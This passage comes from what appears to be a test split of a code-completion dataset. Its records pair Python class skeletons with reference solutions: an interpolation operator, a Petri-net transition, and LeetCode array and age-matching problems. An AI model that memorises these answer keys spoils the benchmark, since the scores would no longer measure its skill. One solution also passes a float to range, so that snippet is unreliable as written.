self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000082", "length_bytes": 3325, "license_type": "no_license", "methods": [{"docstring": "lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)", "name": "__init__", "signature": "def __init__(self, nm, om, dm, crd)"}, {"docstring": "Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array", "name": "forward", "signature": "def forward(self, add, mod, 
dat)"}, {"docstring": "Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array", "name": "adjoint", "signature": "def adjoint(self, add, mod, dat)"}, {"docstring": "Performs the dot product test of the operator", "name": "dottest", "signature": "def dottest(self, add=False)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002275", "prompt": "Implement the Python class `lint` described below.\n\nClass description:\nA linear interpolation operator\n\nMethod signatures and docstrings:\n- def __init__(self, nm, om, dm, crd): lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\n- def forward(self, add, mod, dat): Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\n- def adjoint(self, add, mod, dat): Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\n- def dottest(self, add=False): Performs the dot product test of the operator", "prompted_full_text": "Implement the Python class `lint` described below.\n\nClass description:\nA linear interpolation operator\n\nMethod signatures and docstrings:\n- def __init__(self, nm, om, dm, crd): lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\n- def forward(self, add, mod, dat): Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\n- def adjoint(self, add, mod, dat): Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\n- def dottest(self, add=False): Performs the dot product test of the operator\n\n<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if 
mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n<|end_body_3|>\n", "revision_id": "32a303eddd13385d8778b8bb3b4fbbfbe78bea51", "skeleton": "<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n 
forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n", "source": "the_stack_v2_python_sparse", "source_path": "opt/linopt/essops/lintjit.py", "source_repo": "ke0m/scaas", "split": "test", "star_events_count": 2} {"blob_id": "8269c1ce29e78769d11083c2d0e86a680e9228ea", "bodies": ["super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\nself.delay = delay\nself.delay_counter = 0", "input_place_tokens = self.get_input_place_tokens()\nif self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\nelse:\n self.delay_counter = 0"], "bodies_text": "<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DiscreteTransition", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. 
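Editor's note on the lint record above: dottest verifies the adjoint identity, i.e. that the inner product of F m with random data d equals the inner product of m with F^T d. The same check shown with an explicit matrix in place of the compiled forward_lint/adjoint_lint kernels, which the record calls but does not define:

import numpy as np

# Dot-product (adjoint) test: <d, F m> should equal <m, F^T d> up to rounding.
rng = np.random.default_rng(0)
F = rng.standard_normal((5, 3))   # stand-in linear operator
m = rng.standard_normal(3)        # random model vector
d = rng.standard_normal(5)        # random data vector
lhs = np.dot(d, F @ m)            # forward, then inner product with d
rhs = np.dot(m, F.T @ d)          # adjoint, then inner product with m
print(f'dotd={lhs:.6f} dotm={rhs:.6f} abs err={abs(lhs - rhs):.2e}')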
Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000083", "length_bytes": 32459, "license_type": "permissive", "methods": [{"docstring": "In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.", "name": "__init__", "signature": "def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay)"}, {"docstring": "Check if the firing condition is satisfied during the delay.", "name": "fire", "signature": "def fire(self, time_step)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003292", "prompt": "Implement the Python class `DiscreteTransition` described below.\n\nClass description:\nImplement the DiscreteTransition class.\n\nMethod signatures and docstrings:\n- def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay): In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\n- def fire(self, time_step): Check if the firing condition is satisfied during the delay.", "prompted_full_text": "Implement the Python class `DiscreteTransition` described below.\n\nClass description:\nImplement the DiscreteTransition class.\n\nMethod signatures and docstrings:\n- def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay): In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\n- def fire(self, time_step): Check if the firing condition is satisfied during the delay.\n\n<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. 
Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n<|end_body_0|>\n\n<|body_start_1|>\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n<|end_body_1|>\n", "revision_id": "8e9a3a8151069757475808c48511c9d7486ea334", "skeleton": "<|skeleton|>\nclass DiscreteTransition:\n\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n <|body_0|>\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DiscreteTransition:\n def __init__(self, transition_id, label, firing_condition, consumption_speeds, production_speeds, delay):\n \"\"\"In addition to the arguments specified in the super class ContinuousTransition, a delay function must be specified for a discrete transition. 
Args: delay (int): number of time-steps after which transition is fired if firing_condition still holds true.\"\"\"\n super(DiscreteTransition, self).__init__(transition_id, label, firing_condition, consumption_speeds, production_speeds)\n self.delay = delay\n self.delay_counter = 0\n\n def fire(self, time_step):\n \"\"\"Check if the firing condition is satisfied during the delay.\"\"\"\n input_place_tokens = self.get_input_place_tokens()\n if self.firing_condition(input_place_tokens) == True:\n if self.delay_counter == int(self.delay / time_step):\n super().fire(1)\n self.delay_counter = 0\n else:\n self.delay_counter += 1\n else:\n self.delay_counter = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "HFPN model/utils/hfpn.py", "source_repo": "PN-Alzheimers-Parkinsons/PN_Alzheimers_Parkinsons", "split": "test", "star_events_count": 0} {"blob_id": "8ee134eb1a352e68769346f3324b5c772d69229c", "bodies": ["new = sorted(nums)\nl, r = (0, len(nums) - 1)\nwhile l < r and nums[l] == new[l]:\n l += 1\nwhile l < r and nums[r] == new[r]:\n r -= 1\nreturn r - l + 1 if r > l else 0", "l, r = (0, len(nums) - 1)\nwhile l < r and nums[l] <= nums[l + 1]:\n l += 1\nwhile l < r and nums[r] >= nums[r - 1]:\n r -= 1\nif l == r:\n return 0\nmin_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\nl, r = (0, len(nums) - 1)\nwhile l < r and min_ >= nums[l]:\n l += 1\nwhile l < r and max_ <= nums[r]:\n r -= 1\nreturn r - l + 1"], "bodies_text": "<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000084", "length_bytes": 1656, "license_type": "no_license", "methods": [{"docstring": "原数组排序再比较,求出左右两边不满足要求的索引", "name": "findUnsortedSubarray1", "signature": "def findUnsortedSubarray1(self, nums: List[int]) -> int"}, {"docstring": "1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组", "name": "findUnsortedSubarray2", "signature": "def 
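Editor's note on the DiscreteTransition record above: its docstring names a super class ContinuousTransition that the sparse skeleton elides, so the body does not run standalone. The delay logic itself is simple to isolate: the transition fires only after the condition has held for delay/time_step consecutive steps, and the counter resets whenever the condition breaks. A self-contained sketch of just that counter:

def run(condition_trace, delay, time_step):
    # returns, per step, whether the transition fired on that step
    counter, fired = 0, []
    for ok in condition_trace:
        if ok:
            if counter == int(delay / time_step):
                fired.append(True)   # condition held long enough: fire
                counter = 0
            else:
                fired.append(False)
                counter += 1
        else:
            fired.append(False)      # condition broke: restart the wait
            counter = 0
    return fired

# condition holds for 4 steps, breaks once, then holds again
print(run([1, 1, 1, 1, 0, 1, 1, 1], delay=2, time_step=1))
# -> [False, False, True, False, False, False, False, True]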
findUnsortedSubarray2(self, nums: List[int]) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findUnsortedSubarray1(self, nums: List[int]) -> int: 原数组排序再比较,求出左右两边不满足要求的索引\n- def findUnsortedSubarray2(self, nums: List[int]) -> int: 1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findUnsortedSubarray1(self, nums: List[int]) -> int: 原数组排序再比较,求出左右两边不满足要求的索引\n- def findUnsortedSubarray2(self, nums: List[int]) -> int: 1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\n\n<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n<|end_body_0|>\n\n<|body_start_1|>\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n <|body_0|>\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findUnsortedSubarray1(self, nums: List[int]) -> int:\n \"\"\"原数组排序再比较,求出左右两边不满足要求的索引\"\"\"\n new = sorted(nums)\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] == new[l]:\n l += 1\n while l < r and nums[r] == new[r]:\n r -= 1\n return r - l + 1 if r > l else 0\n\n def findUnsortedSubarray2(self, nums: List[int]) -> int:\n \"\"\"1.从数组两端遍历找破坏升序顺序的索引,从而确定需要无序的连续子数组 2.在无序子数组中找出最大值和最小值 3.再次从两端遍历,找出最大值和最小值正确的索引,两者之差即为最短无序子数组\"\"\"\n l, r = (0, len(nums) - 1)\n while l < r and nums[l] <= nums[l + 1]:\n l += 1\n while l < r and nums[r] >= nums[r - 1]:\n r -= 1\n if l == r:\n return 0\n min_, max_ = (min(nums[l:r + 1]), max(nums[l:r + 1]))\n l, r = (0, len(nums) - 1)\n while l < r and min_ >= nums[l]:\n l += 1\n while l < r and max_ <= nums[r]:\n r -= 1\n return r - l + 1\n", "source": "the_stack_v2_python_sparse", "source_path": "581_shortest-unsorted-continuous-subarray.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": "8dbc80234a765462be4bb6b6b2759f2416839cc8", "bodies": ["count = [0] * 121\nfor age in ages:\n count[age] += 1\nans = 0\nfor ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if 
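Editor's note on the shortest-unsorted-subarray record above: the O(n) variant trims the sorted prefix and suffix, then widens the window until it also covers the min and max of the unsorted middle. Restated inline so the snippet runs on its own, with a worked case:

from typing import List

def shortest_unsorted(nums: List[int]) -> int:
    # trim the already-sorted prefix and suffix
    l, r = 0, len(nums) - 1
    while l < r and nums[l] <= nums[l + 1]:
        l += 1
    while l < r and nums[r] >= nums[r - 1]:
        r -= 1
    if l == r:
        return 0
    # widen so the window covers the middle's min and max
    lo, hi = min(nums[l:r + 1]), max(nums[l:r + 1])
    l, r = 0, len(nums) - 1
    while l < r and lo >= nums[l]:
        l += 1
    while l < r and hi <= nums[r]:
        r -= 1
    return r - l + 1

# prefix [2] and suffix [15] survive; [6,4,8,10,9] must be sorted, so 5
print(shortest_unsorted([2, 6, 4, 8, 10, 9, 15]))  # 5
print(shortest_unsorted([1, 2, 3, 4]))             # 0, already sorted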
ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\nreturn ans", "bucket = [0] * 121\nct = collections.Counter()\nans = 0\nfor age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\nfor age in ages:\n ans += bucket[age]\nfor k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\nreturn ans"], "bodies_text": "<|body_start_0|>\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n count = [0] * 121\n for age in ages:\n count[age] += 1\n ans = 0\n for ageA, countA in enumerate(count):\n for ageB, countB in enumerate(count):\n if ageA * 0.5 + 7 >= ageB:\n continue\n if ageA < ageB:\n continue\n if ageA < 100 < ageB:\n continue\n ans += countA * countB\n if ageA == ageB:\n ans -= countA\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n bucket = [0] * 121\n ct = collections.Counter()\n ans = 0\n for age in ages:\n ct[age] += 1\n a, b = (age / 2 + 8, age)\n for i in range(a, b):\n bucket[i] += 1\n for age in ages:\n ans += bucket[age]\n for k, v in ct.items():\n if v > 1 and k > 14:\n ans += v * (v - 1)\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000085", "length_bytes": 1940, "license_type": "no_license", "methods": [{"docstring": ":type ages: List[int] :rtype: int", "name": "numFriendRequests_1", "signature": "def numFriendRequests_1(self, ages)"}, {"docstring": ":type ages: List[int] :rtype: int", "name": "numFriendRequests_2", "signature": "def numFriendRequests_2(self, ages)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFriendRequests_1(self, ages): :type ages: List[int] :rtype: int\n- def numFriendRequests_2(self, ages): :type ages: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFriendRequests_1(self, ages): :type ages: List[int] :rtype: int\n- def numFriendRequests_2(self, ages): :type ages: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numFriendRequests_1(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFriendRequests_2(self, ages):\n \"\"\":type ages: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n count = [0] * 
